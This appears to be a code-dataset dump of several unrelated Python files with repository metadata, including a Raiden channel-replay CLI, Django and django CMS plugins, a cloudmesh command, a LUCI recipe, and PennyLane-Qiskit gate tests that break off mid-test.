        # Enable to print color coded presence state of channel partners
        # print_presence_view(chain_state, translator)
        # Enable to print balances & balance sum with all channel partners
        # print_node_balances(chain_state, token_network_address, translator)
        print_nl()
@click.command(help=__doc__)
@click.argument("db-file", type=click.Path(exists=True))
@click.argument("token-network-address")
@click.argument("partner-address")
@click.option(
    "-x",
    "--names-translator",
    type=click.File(),
    help="A JSON file with replacement rules, e.g.: "
    '\'{ "0xb4f44cd22a84DE0774B802e422D4c26A73Dd68d7": "Bob", '
    '"identifier": "XXX" }\' would replace all instances of the address (pex\'ed, lowercase, '
    'checksummed) with "[Bob]" and all mentions of "identifier" with "[XXX]. '
    'It also allows you to use "Bob" as parameter value for "-n" and "-p" switches.',
)
def main(
    db_file: str, token_network_address: str, partner_address: str, names_translator: TextIO
) -> None:
    # CLI entry point: open the given Raiden DB and replay its WAL for the
    # channel identified by token network address + partner address.
    translator: Optional[Translator]
    if names_translator:
        translator = Translator(json.load(names_translator))
        # Allow the readable names from the translator file to be passed on
        # the command line in place of the raw addresses.
        lookup = {v: k for k, v in translator.items()}
        token_network_address = lookup.get(token_network_address, token_network_address)
        partner_address = lookup.get(partner_address, partner_address)
    else:
        translator = None
    assert is_address(token_network_address), "token_network_address must be provided"
    assert is_address(partner_address), "partner_address must be provided"
    # ``closing`` guarantees the SQLite storage is closed even on error.
    with closing(SerializedSQLiteStorage(Path(db_file), JSONSerializer())) as storage:
        replay_wal(
            storage=storage,
            token_network_address=TokenNetworkAddress(to_canonical_address(token_network_address)),
            partner_address=to_canonical_address(partner_address),
            translator=translator,
        )
if __name__ == "__main__":
    main()  # pylint: disable=no-value-for-parameter
| 36.205882 | 99 | 0.678401 |
import json
import re
from contextlib import closing
from pathlib import Path
from typing import NoReturn, TextIO
import click
from eth_utils import encode_hex, is_address, to_canonical_address, to_checksum_address
from raiden.storage.serialization import JSONSerializer
from raiden.storage.sqlite import (
LOW_STATECHANGE_ULID,
RANGE_ALL_STATE_CHANGES,
SerializedSQLiteStorage,
)
from raiden.storage.wal import WriteAheadLog, dispatch
from raiden.transfer import channel, node, views
from raiden.transfer.architecture import Event, StateChange
from raiden.transfer.state import NetworkState
from raiden.utils.formatting import pex
from raiden.utils.typing import (
Address,
Any,
Balance,
ChannelID,
Dict,
Iterable,
List,
Nonce,
Optional,
SecretHash,
TokenNetworkAddress,
Tuple,
)
class Translator(dict):
def __init__(self, *args: Any, **kwargs: Any) -> None:
kwargs = {k.lower(): v for k, v in args[0].items()}
super().__init__(kwargs)
self._extra_keys: Dict[str, str] = dict()
self._regex: Optional[re.Pattern[str]] = None
self._make_regex()
def _address_rxp(self, addr: str) -> str:
try:
addr = str(to_checksum_address(addr))
rxp = "(?:0x)?" + pex(to_canonical_address(addr)) + f"(?:{addr.lower()[10:]})?"
self._extra_keys[pex(to_canonical_address(addr))] = addr.lower()
self._extra_keys[addr[2:].lower()] = addr.lower()
except ValueError:
rxp = addr
return rxp
def _make_regex(self) -> None:
rxp = "|".join(map(self._address_rxp, self.keys()))
self._regex = re.compile(rxp, re.IGNORECASE)
def __setitem__(self, key: str, value: Any) -> NoReturn:
raise NotImplementedError(f"{self.__class__} must not dynamically modified")
def __pop__(self, key: str) -> NoReturn:
raise NotImplementedError(f"{self.__class__} must not dynamically modified")
def __getitem__(self, key: str) -> Any:
try:
return dict.__getitem__(self, key)
except KeyError as e:
alt = self._extra_keys.get(key)
try:
return dict.__getitem__(self, alt)
except KeyError:
raise e
def __call__(self, match: re.Match) -> str:
return "[{}]".format(self[match.group(0).lower()])
def translate(self, text: str) -> str:
assert self._regex is not None, "regex not set"
return self._regex.sub(self, text)
def state_change_contains_secrethash(obj: Any, secrethash: SecretHash) -> bool:
return (hasattr(obj, "secrethash") and obj.secrethash == secrethash) or (
hasattr(obj, "transfer")
and (
(hasattr(obj.transfer, "secrethash") and obj.transfer.secrethash == secrethash)
or (hasattr(obj.transfer, "lock") and obj.transfer.lock.secrethash == secrethash)
)
)
def state_change_with_nonce(
obj: Any, nonce: Nonce, channel_identifier: ChannelID, sender: Address
) -> bool:
return (
hasattr(obj, "balance_proof")
and obj.balance_proof.nonce == nonce
and obj.balance_proof.channel_identifier == channel_identifier
and obj.balance_proof.sender == to_canonical_address(sender)
)
def print_attributes(data: Dict, translator: Optional[Translator] = None) -> None:
if translator is None:
trans = lambda s: s
else:
trans = translator.translate
for key, value in data.items():
if isinstance(value, bytes):
value = encode_hex(value)
click.echo("\t", nl=False)
click.echo(click.style(key, fg="blue"), nl=False)
click.echo(click.style("="), nl=False)
click.echo(click.style(trans(repr(value)), fg="yellow"))
def print_state_change(state_change: StateChange, translator: Optional[Translator] = None) -> None:
click.echo(click.style(f"> {state_change.__class__.__name__}", fg="red", bold=True))
print_attributes(state_change.__dict__, translator=translator)
def print_events(events: Iterable[Event], translator: Optional[Translator] = None) -> None:
for event in events:
click.echo(click.style(f"< {event.__class__.__name__}", fg="green", bold=True))
print_attributes(event.__dict__, translator=translator)
def print_presence_view(chain_state: Any, translator: Optional[Translator] = None) -> None:
if translator is None:
trans = lambda s: s
else:
trans = translator.translate
def network_state_to_color(network_state: NetworkState) -> Optional[str]:
if network_state == NetworkState.REACHABLE:
return "green"
if network_state == NetworkState.UNREACHABLE:
return "red"
if network_state == NetworkState.UNKNOWN:
return "white"
return None
click.secho("Presence:", nl=False, fg="white")
for k, v in chain_state.nodeaddresses_to_networkstates.items():
click.secho(f" {trans(pex(k))}", fg=network_state_to_color(v), nl=False)
click.echo("", nl=True)
def get_node_balances(
chain_state: Any, token_network_address: TokenNetworkAddress
) -> List[Tuple[Address, Balance, Balance]]:
channels = views.list_all_channelstate(chain_state)
channels = [
raiden_channel
for raiden_channel in channels
if raiden_channel.canonical_identifier.token_network_address
== to_canonical_address(token_network_address)
]
balances = [
(
channel_state.partner_state.address,
channel.get_balance(channel_state.our_state, channel_state.partner_state),
channel.get_balance(channel_state.partner_state, channel_state.our_state),
)
for channel_state in channels
]
return balances
def print_node_balances(
chain_state: Any,
token_network_address: TokenNetworkAddress,
translator: Optional[Translator] = None,
) -> None:
if translator is None:
trans = lambda s: s
else:
trans = translator.translate
balances = get_node_balances(chain_state, token_network_address)
for balance in balances:
click.secho(f"{trans(pex(balance[0]))} ->{balance[1]} <-{balance[2]}", fg="blue")
click.secho(f"Sum {trans(pex(chain_state.our_address))}: {sum(b[1] for b in balances)}")
def print_nl() -> None:
click.echo("-" * click.get_terminal_size()[0], nl=True)
def replay_wal(
storage: SerializedSQLiteStorage,
token_network_address: TokenNetworkAddress,
partner_address: Address,
translator: Optional[Translator] = None,
) -> None:
snapshot = storage.get_snapshot_before_state_change(
state_change_identifier=LOW_STATECHANGE_ULID
)
assert snapshot is not None, "No snapshot found"
wal = WriteAheadLog(snapshot.data, storage, node.state_transition)
state = wal.get_current_state()
all_state_changes = storage.get_statechanges_by_range(RANGE_ALL_STATE_CHANGES)
for state_change in all_state_changes:
state, events = dispatch(
state=state,
state_change=state_change,
state_transition=wal.state_transition,
)
msg = "Chain state must never be cleared up."
assert state, msg
channel_state = views.get_channelstate_by_token_network_and_partner(
state,
to_canonical_address(token_network_address),
to_canonical_address(partner_address),
)
if channel_state is None:
continue
print_state_change(state_change, translator=translator)
print_events(events, translator=translator)
print_nl()
@click.command(help=__doc__)
@click.argument("db-file", type=click.Path(exists=True))
@click.argument("token-network-address")
@click.argument("partner-address")
@click.option(
"-x",
"--names-translator",
type=click.File(),
help="A JSON file with replacement rules, e.g.: "
'\'{ "0xb4f44cd22a84DE0774B802e422D4c26A73Dd68d7": "Bob", '
'"identifier": "XXX" }\' would replace all instances of the address (pex\'ed, lowercase, '
'checksummed) with "[Bob]" and all mentions of "identifier" with "[XXX]. '
'It also allows you to use "Bob" as parameter value for "-n" and "-p" switches.',
)
def main(
db_file: str, token_network_address: str, partner_address: str, names_translator: TextIO
) -> None:
translator: Optional[Translator]
if names_translator:
translator = Translator(json.load(names_translator))
lookup = {v: k for k, v in translator.items()}
token_network_address = lookup.get(token_network_address, token_network_address)
partner_address = lookup.get(partner_address, partner_address)
else:
translator = None
assert is_address(token_network_address), "token_network_address must be provided"
assert is_address(partner_address), "partner_address must be provided"
with closing(SerializedSQLiteStorage(Path(db_file), JSONSerializer())) as storage:
replay_wal(
storage=storage,
token_network_address=TokenNetworkAddress(to_canonical_address(token_network_address)),
partner_address=to_canonical_address(partner_address),
translator=translator,
)
if __name__ == "__main__":
main() # pylint: disable=no-value-for-parameter
| true | true |
1c3c7f55377f7b300bbda40d7779e8a3d87fb58e | 199 | py | Python | 32.3/test_testing_fail.py | vinigofr/computer-science-exercises | b60ef1c5e3be09ff4c4241afc4279250c1e7129a | [
"MIT"
] | null | null | null | 32.3/test_testing_fail.py | vinigofr/computer-science-exercises | b60ef1c5e3be09ff4c4241afc4279250c1e7129a | [
"MIT"
] | null | null | null | 32.3/test_testing_fail.py | vinigofr/computer-science-exercises | b60ef1c5e3be09ff4c4241afc4279250c1e7129a | [
"MIT"
] | null | null | null | from testing_fail import divide
import pytest
def test_divide_when_other_number_is_zero_raises_an_exception():
    """``divide`` must propagate ZeroDivisionError with Python's own message."""
    with pytest.raises(ZeroDivisionError, match="division by zero"):
        divide(2, 0)
import pytest
def test_divide_when_other_number_is_zero_raises_an_exception():
with pytest.raises(ZeroDivisionError, match="division by zero"):
divide(2, 0) | true | true |
1c3c7fa160c023eb462f4d6b93557b293d6c71bc | 774 | py | Python | PenBlog/urls.py | quanix/PenBlog | 6d017b847115bba595215d6cfc9a1ca9f84807bb | [
"Apache-2.0"
] | 3 | 2015-01-27T01:05:01.000Z | 2018-09-23T03:05:55.000Z | PenBlog/urls.py | quanix/PenBlog | 6d017b847115bba595215d6cfc9a1ca9f84807bb | [
"Apache-2.0"
] | null | null | null | PenBlog/urls.py | quanix/PenBlog | 6d017b847115bba595215d6cfc9a1ca9f84807bb | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding:utf-8 -*-
from django.conf.urls import patterns, include, url
# from django.contrib import admin
# admin.autodiscover()
from PenBlog import views
# NOTE(review): ``patterns()`` was deprecated in Django 1.8 and removed in
# 1.10 -- presumably this project targets an older Django; confirm before
# upgrading.
urlpatterns = patterns('',
    # Home page (default view and paginated view).
    url(r'^$', views.show_homepage, {'page': 1}),
    url( r'^page/(\d+?)/$', views.show_homepage),
    # Serve static assets through Django while debugging.
    url(r'\.(css|js|png|jpg|gif|xml|swf|html)$', views.get_file),
    # Installation page.
    url(r'^install/$', views.install),
    url(r'^login/', views.login),
    url(r'^logout/', views.logout),
    url(r'^register/$', views.register),
    url(r'^article/(\d+?)/$', views.show_article),
    url(r'^category/(.+?)/$', views.show_category),
    url(r'^tag/(.+?)/$', views.show_tag),
    # Admin pages.
    url(r'^admin/', include('PenBlog.admin.urls')),
)
| 25.8 | 65 | 0.603359 |
from django.conf.urls import patterns, include, url
from PenBlog import views
urlpatterns = patterns('',
url(r'^$', views.show_homepage, {'page': 1}),
url( r'^page/(\d+?)/$', views.show_homepage),
url(r'\.(css|js|png|jpg|gif|xml|swf|html)$', views.get_file),
url(r'^install/$', views.install),
url(r'^login/', views.login),
url(r'^logout/', views.logout),
url(r'^register/$', views.register),
url(r'^article/(\d+?)/$', views.show_article),
url(r'^category/(.+?)/$', views.show_category),
url(r'^tag/(.+?)/$', views.show_tag),
url(r'^admin/', include('PenBlog.admin.urls')),
)
| true | true |
1c3c7fba409c4819576e4f1f3a92ff3597ce9484 | 494 | py | Python | sdk/batch/azure-batch/azure/batch/_version.py | moovy2/azure-sdk-for-python | 6b0495dc9917d47a7264f26cbd3221d43461a537 | [
"MIT"
] | 2,728 | 2015-01-09T10:19:32.000Z | 2022-03-31T14:50:33.000Z | sdk/batch/azure-batch/azure/batch/_version.py | v-xuto/azure-sdk-for-python | 9c6296d22094c5ede410bc83749e8df8694ccacc | [
"MIT"
] | 17,773 | 2015-01-05T15:57:17.000Z | 2022-03-31T23:50:25.000Z | sdk/batch/azure-batch/azure/batch/_version.py | v-xuto/azure-sdk-for-python | 9c6296d22094c5ede410bc83749e8df8694ccacc | [
"MIT"
] | 1,916 | 2015-01-19T05:05:41.000Z | 2022-03-31T19:36:44.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# Package version string (file generated by AutoRest -- see header above).
VERSION = "11.0.1"
| 35.285714 | 76 | 0.520243 |
VERSION = "11.0.1"
| true | true |
1c3c81a1792f488fe2e3c6317ed7f0974f6c7a4b | 3,520 | py | Python | cloudmesh/sys/command/sys.py | cloudmesh/cloudmesh-sys | c65e717caa5533c6eb3bb32cb6e480dc8a004646 | [
"Apache-2.0"
] | null | null | null | cloudmesh/sys/command/sys.py | cloudmesh/cloudmesh-sys | c65e717caa5533c6eb3bb32cb6e480dc8a004646 | [
"Apache-2.0"
] | null | null | null | cloudmesh/sys/command/sys.py | cloudmesh/cloudmesh-sys | c65e717caa5533c6eb3bb32cb6e480dc8a004646 | [
"Apache-2.0"
] | 1 | 2020-03-23T03:03:30.000Z | 2020-03-23T03:03:30.000Z | """
The sys command to manage the cmd5 distribution
"""
from cloudmesh.shell.command import PluginCommand
from cloudmesh.shell.command import command
from cloudmesh.sys.manage import Command, Git, Version
import shutil
import glob
from cloudmesh.common.util import path_expand
import os
class SysCommand(PluginCommand):
    """
    The system command
    """

    # noinspection PyUnusedLocal
    @command
    def do_sys(self, args, arguments):
        """
        ::

          Usage:
                sys upload
                sys commit MESSAGE
                sys command generate NAME [.]
                sys generate command NAME [.]
                sys version VERSION

          This command does some useful things.

          Arguments:
              MESSAGE   the message to commit
              NAME      the command to generate
              VERSION   the version number

          Options:
              -f        specify the file

          Description:
            cms sys command generate NAME

                When you execute this command it
                will generate a directory tree for a command
                with the name

                    cloudmesh-NAME

                To install the command you need to

                    cd cloudmesh-NAME
                    pip install -e .

                or

                    pip install .

            cms sys generate command NAME .
            cms sys command generate NAME .

                the code will be installed in the current directory. This is
                helpful, if you already are in a directory of the name
                cloudmesh-NAME, e.g. if you already created it in github and
                like to add a command in that github directory.

            The commands 'version', 'commit' and 'upload'
            are only to be used by Gregor.

            cms version

                The version command adds a new version to the
                VERSION file for cmd5, common, and sys.
                This helps to keep the versions aligned across
                these modules.

            cms commit

                The commit command adds a new version and commits

            cms upload

                The upload command uploads the new version to pypi
        """
        # NOTE(review): debugging aid left in place -- prints the parsed
        # docopt arguments on every invocation; confirm it is intentional.
        print(arguments)
        dot = arguments["."]
        if arguments.commit:
            msg = arguments.MESSAGE
            Git.commit(msg)
        elif arguments.upload:
            Git.upload()
        elif arguments.readme and arguments.generate:
            # NOTE(review): 'readme' does not appear in the Usage section
            # above -- presumably a leftover branch; confirm before removing.
            name = arguments.NAME
            Command.generate(name)
        elif arguments.command and arguments.generate:
            name = arguments.NAME
            Command.generate(name)
            if dot:
                # Generate "in place": flatten the generated cloudmesh-NAME
                # tree into the current directory, discarding boilerplate
                # files that would clash with an existing checkout.
                for file in ["LICENSE",
                             ".bumpversion.cfg",
                             ".gitignore",
                             "requirements.txt",
                             "Makefile"]:
                    try:
                        os.remove(file)
                    except OSError:
                        # Best effort: the file may simply not exist.  (This
                        # was a bare ``except:``, which also swallowed
                        # KeyboardInterrupt and SystemExit.)
                        pass
                for entry in glob.glob("cloudmesh-{name}/**".format(name=name)):
                    shutil.move(entry, path_expand("."))
                for entry in glob.glob("cloudmesh-{name}/.*".format(name=name)):
                    shutil.move(entry, path_expand("."))
                shutil.rmtree("cloudmesh-{name}".format(name=name))
        elif arguments.version:
            version = arguments.VERSION
            Version.set(version)
| 27.5 | 80 | 0.52642 | from cloudmesh.shell.command import PluginCommand
from cloudmesh.shell.command import command
from cloudmesh.sys.manage import Command, Git, Version
import shutil
import glob
from cloudmesh.common.util import path_expand
import os
class SysCommand(PluginCommand):
@command
def do_sys(self, args, arguments):
print(arguments)
dot = arguments["."]
if arguments.commit:
msg = arguments.MESSAGE
Git.commit(msg)
elif arguments.upload:
Git.upload()
elif arguments.readme and arguments.generate:
name = arguments.NAME
Command.generate(name)
elif arguments.command and arguments.generate:
name = arguments.NAME
Command.generate(name)
if dot:
for file in ["LICENSE",
".bumpversion.cfg",
".gitignore",
"requirements.txt",
"Makefile"]:
try:
os.remove(file)
except:
pass
for entry in glob.glob("cloudmesh-{name}/**".format(name=name)):
shutil.move(entry, path_expand("."))
for entry in glob.glob("cloudmesh-{name}/.*".format(name=name)):
shutil.move(entry, path_expand("."))
shutil.rmtree("cloudmesh-{name}".format(name=name))
elif arguments.version:
version = arguments.VERSION
Version.set(version)
| true | true |
1c3c823675ef391f2f5882e9796ce320b343f4c1 | 1,523 | py | Python | recipe_modules/resultdb/examples/include.py | Acidburn0zzz/luci | d8993f4684839b58f5f966dd6273d1d8fd001eae | [
"Apache-2.0"
] | 1 | 2021-04-24T04:03:01.000Z | 2021-04-24T04:03:01.000Z | recipe_modules/resultdb/examples/include.py | Acidburn0zzz/luci | d8993f4684839b58f5f966dd6273d1d8fd001eae | [
"Apache-2.0"
] | null | null | null | recipe_modules/resultdb/examples/include.py | Acidburn0zzz/luci | d8993f4684839b58f5f966dd6273d1d8fd001eae | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
from recipe_engine.post_process import (DropExpectation, StepSuccess,
DoesNotRunRE)
from PB.go.chromium.org.luci.buildbucket.proto import build as build_pb2
from PB.go.chromium.org.luci.resultdb.proto.v1 import invocation as invocation_pb2
DEPS = [
'buildbucket',
'resultdb',
]
def RunSteps(api):
inv_bundle = api.resultdb.query(
['deadbeef'],
step_name='rdb query',
variants_with_unexpected_results=True,
)
invocation_ids = inv_bundle.keys()
api.resultdb.include_invocations(invocation_ids, step_name='rdb include')
api.resultdb.exclude_invocations(invocation_ids, step_name='rdb exclude')
def GenTests(api):
yield (
api.test('noop') +
api.buildbucket.ci_build() +
api.resultdb.query({}, step_name='rdb query') +
api.post_process(
DoesNotRunRE, 'rdb include', 'rdb exclude') +
api.post_process(DropExpectation)
)
inv_bundle = {
'invid': api.resultdb.Invocation(
proto=invocation_pb2.Invocation(
state=invocation_pb2.Invocation.FINALIZED),
),
'invid2': api.resultdb.Invocation(
proto=invocation_pb2.Invocation(
state=invocation_pb2.Invocation.FINALIZED),
),
}
yield (
api.test('basic') +
api.buildbucket.ci_build() +
api.resultdb.query(
inv_bundle,
step_name='rdb query')
)
| 27.690909 | 82 | 0.693368 |
from recipe_engine.post_process import (DropExpectation, StepSuccess,
DoesNotRunRE)
from PB.go.chromium.org.luci.buildbucket.proto import build as build_pb2
from PB.go.chromium.org.luci.resultdb.proto.v1 import invocation as invocation_pb2
DEPS = [
'buildbucket',
'resultdb',
]
def RunSteps(api):
inv_bundle = api.resultdb.query(
['deadbeef'],
step_name='rdb query',
variants_with_unexpected_results=True,
)
invocation_ids = inv_bundle.keys()
api.resultdb.include_invocations(invocation_ids, step_name='rdb include')
api.resultdb.exclude_invocations(invocation_ids, step_name='rdb exclude')
def GenTests(api):
yield (
api.test('noop') +
api.buildbucket.ci_build() +
api.resultdb.query({}, step_name='rdb query') +
api.post_process(
DoesNotRunRE, 'rdb include', 'rdb exclude') +
api.post_process(DropExpectation)
)
inv_bundle = {
'invid': api.resultdb.Invocation(
proto=invocation_pb2.Invocation(
state=invocation_pb2.Invocation.FINALIZED),
),
'invid2': api.resultdb.Invocation(
proto=invocation_pb2.Invocation(
state=invocation_pb2.Invocation.FINALIZED),
),
}
yield (
api.test('basic') +
api.buildbucket.ci_build() +
api.resultdb.query(
inv_bundle,
step_name='rdb query')
)
| true | true |
1c3c828fa327c8f7bb69e82337a322cd7761fe1b | 2,862 | py | Python | djangocms_baseplugins/cms_form_designer/cms_plugins.py | benzkji/djangocms-baseplugins | 7f041a030ed93dcdec70e4ca777b841846b8f2f2 | [
"MIT"
] | 2 | 2019-04-14T01:31:22.000Z | 2020-03-05T13:06:57.000Z | djangocms_baseplugins/cms_form_designer/cms_plugins.py | benzkji/djangocms-baseplugins | 7f041a030ed93dcdec70e4ca777b841846b8f2f2 | [
"MIT"
] | 32 | 2017-04-04T09:28:06.000Z | 2021-08-18T16:23:02.000Z | djangocms_baseplugins/cms_form_designer/cms_plugins.py | bnzk/djangocms-baseplugins | 7f041a030ed93dcdec70e4ca777b841846b8f2f2 | [
"MIT"
] | null | null | null | # coding: utf-8
import uuid
from cms.plugin_base import CMSPluginBase
from cms.plugin_pool import plugin_pool
from django import forms
from django.contrib import admin
from django.utils.text import slugify
from django.utils.translation import ugettext_lazy as _
from djangocms_baseplugins.baseplugin.cms_plugins import BasePluginMixin
from djangocms_baseplugins.baseplugin.utils import build_baseplugin_fieldset, \
get_fields_from_fieldsets, build_baseplugin_widgets, get_baseplugin_widgets
from djangocms_baseplugins.baseplugin import defaults
# from django.core.mail import send_mail
# from django.shortcuts import render
from .utils import check_form_send
from .models import FormDesigner, FormDefaultValue
from . import conf
# from django.conf import settings
class FormDefaultValueInline(admin.TabularInline):
model = FormDefaultValue
extra = 1
class FormDesignerPluginForm(forms.ModelForm):
class Meta:
model = FormDesigner
fields = get_fields_from_fieldsets(conf.FIELDSETS)
# exclude = []
widgets = get_baseplugin_widgets(conf)
@plugin_pool.register_plugin
class FormDesignerPlugin(BasePluginMixin, CMSPluginBase):
model = FormDesigner
module = conf.MODULE
name = conf.NAME
cache = False
form = FormDesignerPluginForm
inlines = (FormDefaultValueInline, )
render_template = "djangocms_baseplugins/form_designer.html"
allow_children = conf.ALLOW_CHILDREN
child_classes = conf.CHILD_CLASSES
require_parent = conf.REQUIRE_PARENT
fieldsets = conf.FIELDSETS
def render(self, context, instance, placeholder):
context = super().render(context, instance, placeholder)
request = context.get('request', None)
# defaults
initial = {}
for default in instance.default_values.all():
initial[slugify(default.field_name)] = slugify(default.default)
# build form
form_class = instance.form.form()
form = None
if request and request.method.lower() == 'post':
if request.POST.get('form_content_id', None) == str(instance.id):
form = form_class(request.POST, initial=initial)
if not form:
form = form_class(initial=initial)
sent = check_form_send(instance, request)
if sent:
# sent directly
context["sent"] = True
# if middleware is enabled, this causes the reidrect!
request.form_designer_sent = instance.pk
# if not, we dont get a redirect, and can submit the form again, with F5!
elif request and request.GET.get('sent', None) and request.GET.get('id', None) == str(instance.pk):
# sent via app hook
context["sent"] = True
context['form'] = form
context['submit_uuid'] = str(uuid.uuid1())
return context
| 36.692308 | 107 | 0.701607 |
import uuid
from cms.plugin_base import CMSPluginBase
from cms.plugin_pool import plugin_pool
from django import forms
from django.contrib import admin
from django.utils.text import slugify
from django.utils.translation import ugettext_lazy as _
from djangocms_baseplugins.baseplugin.cms_plugins import BasePluginMixin
from djangocms_baseplugins.baseplugin.utils import build_baseplugin_fieldset, \
get_fields_from_fieldsets, build_baseplugin_widgets, get_baseplugin_widgets
from djangocms_baseplugins.baseplugin import defaults
from .utils import check_form_send
from .models import FormDesigner, FormDefaultValue
from . import conf
class FormDefaultValueInline(admin.TabularInline):
model = FormDefaultValue
extra = 1
class FormDesignerPluginForm(forms.ModelForm):
class Meta:
model = FormDesigner
fields = get_fields_from_fieldsets(conf.FIELDSETS)
widgets = get_baseplugin_widgets(conf)
@plugin_pool.register_plugin
class FormDesignerPlugin(BasePluginMixin, CMSPluginBase):
model = FormDesigner
module = conf.MODULE
name = conf.NAME
cache = False
form = FormDesignerPluginForm
inlines = (FormDefaultValueInline, )
render_template = "djangocms_baseplugins/form_designer.html"
allow_children = conf.ALLOW_CHILDREN
child_classes = conf.CHILD_CLASSES
require_parent = conf.REQUIRE_PARENT
fieldsets = conf.FIELDSETS
def render(self, context, instance, placeholder):
context = super().render(context, instance, placeholder)
request = context.get('request', None)
initial = {}
for default in instance.default_values.all():
initial[slugify(default.field_name)] = slugify(default.default)
form_class = instance.form.form()
form = None
if request and request.method.lower() == 'post':
if request.POST.get('form_content_id', None) == str(instance.id):
form = form_class(request.POST, initial=initial)
if not form:
form = form_class(initial=initial)
sent = check_form_send(instance, request)
if sent:
context["sent"] = True
request.form_designer_sent = instance.pk
elif request and request.GET.get('sent', None) and request.GET.get('id', None) == str(instance.pk):
context["sent"] = True
context['form'] = form
context['submit_uuid'] = str(uuid.uuid1())
return context
| true | true |
1c3c83626908ec5b7a167858c74ebdcf9cf8167b | 522 | py | Python | RecoBTag/Skimming/python/btagMC_QCD_380_470OutputModule_cfi.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 852 | 2015-01-11T21:03:51.000Z | 2022-03-25T21:14:00.000Z | RecoBTag/Skimming/python/btagMC_QCD_380_470OutputModule_cfi.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 30,371 | 2015-01-02T00:14:40.000Z | 2022-03-31T23:26:05.000Z | RecoBTag/Skimming/python/btagMC_QCD_380_470OutputModule_cfi.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 3,240 | 2015-01-02T05:53:18.000Z | 2022-03-31T17:24:21.000Z | import FWCore.ParameterSet.Config as cms
from Configuration.EventContent.EventContent_cff import *
from RecoBTag.Skimming.btagMC_QCD_380_470_EventContent_cff import *
btagMC_QCD_380_470OutputModule = cms.OutputModule("PoolOutputModule",
btagMC_QCD_380_470EventSelection,
FEVTSIMEventContent,
dataset = cms.untracked.PSet(
filterName = cms.untracked.string('btagMC_QCD_380_470'),
dataTier = cms.untracked.string('USER')
),
fileName = cms.untracked.string('btagMC_QCD_380_470.root')
)
| 32.625 | 69 | 0.777778 | import FWCore.ParameterSet.Config as cms
from Configuration.EventContent.EventContent_cff import *
from RecoBTag.Skimming.btagMC_QCD_380_470_EventContent_cff import *
btagMC_QCD_380_470OutputModule = cms.OutputModule("PoolOutputModule",
btagMC_QCD_380_470EventSelection,
FEVTSIMEventContent,
dataset = cms.untracked.PSet(
filterName = cms.untracked.string('btagMC_QCD_380_470'),
dataTier = cms.untracked.string('USER')
),
fileName = cms.untracked.string('btagMC_QCD_380_470.root')
)
| true | true |
1c3c83caf0e0f96a864074a2ce45955ef49e3112 | 267 | py | Python | Python/100Excersises/76 to 100/85/.history/85_20201119145048.py | magusikrak/NAMI-TERM-I-GroupWork | f0a9a5f219ccbec024eb5316361db3fca46e171c | [
"MIT"
] | null | null | null | Python/100Excersises/76 to 100/85/.history/85_20201119145048.py | magusikrak/NAMI-TERM-I-GroupWork | f0a9a5f219ccbec024eb5316361db3fca46e171c | [
"MIT"
] | 1 | 2021-07-24T03:18:30.000Z | 2021-07-24T12:45:07.000Z | Python/100Excersises/76 to 100/85/.history/85_20201119145048.py | sugamkarki/NAMI-Year-II-TERM-I-Group_Project | f0a9a5f219ccbec024eb5316361db3fca46e171c | [
"MIT"
] | null | null | null | # str="hi i m adon"
#
myFile=open("c.txt","r")
countriesRaw=myFile.read()
countriesNeat=''
countriesRaw= countriesRaw.split(" ")
for country in countriesRaw:
# print(country)
if(len(country)>1):
countriesNeat =countriesNeat+'\n'+country
print | 24.272727 | 49 | 0.666667 |
myFile=open("c.txt","r")
countriesRaw=myFile.read()
countriesNeat=''
countriesRaw= countriesRaw.split(" ")
for country in countriesRaw:
if(len(country)>1):
countriesNeat =countriesNeat+'\n'+country
print | true | true |
1c3c83dfa812ecc2f3f7ce8b8c18dca085ae6f24 | 9,126 | py | Python | tests/test_inverses.py | TannerRogalsky/pennylane-qiskit | 4d1646d17d36cc28bfd61c03d32f130e3e14e278 | [
"Apache-2.0"
] | 75 | 2020-08-07T14:21:15.000Z | 2022-03-23T15:19:28.000Z | tests/test_inverses.py | TannerRogalsky/pennylane-qiskit | 4d1646d17d36cc28bfd61c03d32f130e3e14e278 | [
"Apache-2.0"
] | 110 | 2020-07-28T07:02:17.000Z | 2022-03-28T20:47:27.000Z | tests/test_inverses.py | TannerRogalsky/pennylane-qiskit | 4d1646d17d36cc28bfd61c03d32f130e3e14e278 | [
"Apache-2.0"
] | 23 | 2020-08-06T08:07:18.000Z | 2022-03-03T01:28:26.000Z | import pytest
import pennylane as qml
import math
import cmath
import numpy as np
# defaults
tol = 1e-5
class TestInverses:
"""Tests that the inverse of the operations are applied."""
# This test is ran against the state |0> with one Z expval
@pytest.mark.parametrize(
"name,expected_output",
[
("Identity", 1),
("PauliX", -1),
("PauliY", -1),
("PauliZ", 1),
("Hadamard", 0),
("S", 1),
("T", 1),
("SX", 0),
],
)
def test_supported_gate_inverse_single_wire_no_parameters(self, name, expected_output):
"""Tests the inverse of supported gates that act on a single wire that are not
parameterized"""
op = getattr(qml.ops, name)
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
@qml.qnode(dev)
def circuit():
op(wires=0).inv()
return qml.expval(qml.PauliZ(0))
assert np.isclose(circuit(), expected_output, atol=tol, rtol=0)
# This test is ran against the state |Phi+> with two Z expvals
@pytest.mark.parametrize(
"name,expected_output",
[
("CNOT", [-1 / 2, 1]),
("SWAP", [-1 / 2, -1 / 2]),
("CZ", [-1 / 2, -1 / 2]),
],
)
def test_supported_gate_inverse_two_wires_no_parameters(self, name, expected_output):
"""Tests the inverse of supported gates that act on two wires that are not parameterized"""
op = getattr(qml.ops, name)
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
assert dev.supports_operation(name)
@qml.qnode(dev)
def circuit():
qml.QubitStateVector(np.array([1 / 2, 0, 0, math.sqrt(3) / 2]), wires=[0, 1])
